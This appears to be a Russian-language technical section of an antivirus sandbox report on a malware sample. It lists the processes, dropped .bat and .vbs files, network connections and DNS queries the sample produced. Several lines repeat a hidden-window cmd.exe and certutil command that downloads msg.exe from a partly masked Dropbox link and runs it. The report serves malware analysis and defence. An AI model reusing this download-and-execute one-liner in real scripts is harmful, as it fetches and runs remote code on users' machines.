Техническая информация
- '<SYSTEM32>\cmd.exe' /c certutil -urlcache -split -f https://www.dr##box.com/s/34ath0aqx3yy7xd/msg.exe?dl## msg.exe >nul&if exist msg.exe start msg.exe
- nul
- <Текущая директория>\msg.exe
- %TEMP%\13dd.tmp\142c.tmp\143d.bat
- <Текущая директория>\msg.vbs
- %TEMP%\13dd.tmp\142c.tmp\143d.bat
- 'dr##box.com':443
- 'uc#############4ef6624fd9324.dl.dropboxusercontent.com':443
- DNS ASK dr##box.com
- DNS ASK uc#############4ef6624fd9324.dl.dropboxusercontent.com
- DNS ASK st####.rapidssl.com
- '<Текущая директория>\msg.exe'
- '<SYSTEM32>\wscript.exe' "<Текущая директория>\msg.vbs"
- '<SYSTEM32>\cmd.exe' /c certutil -urlcache -split -f https://www.dr##box.com/s/34ath0aqx3yy7xd/msg.exe?dl## msg.exe >nul&if exist msg.exe start msg.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\13DD.tmp\142C.tmp\143D.bat <Текущая директория>\msg.exe"' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://www.dr##box.com/s/34ath0aqx3yy7xd/msg.exe?dl## msg.exe
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\13DD.tmp\142C.tmp\143D.bat <Текущая директория>\msg.exe"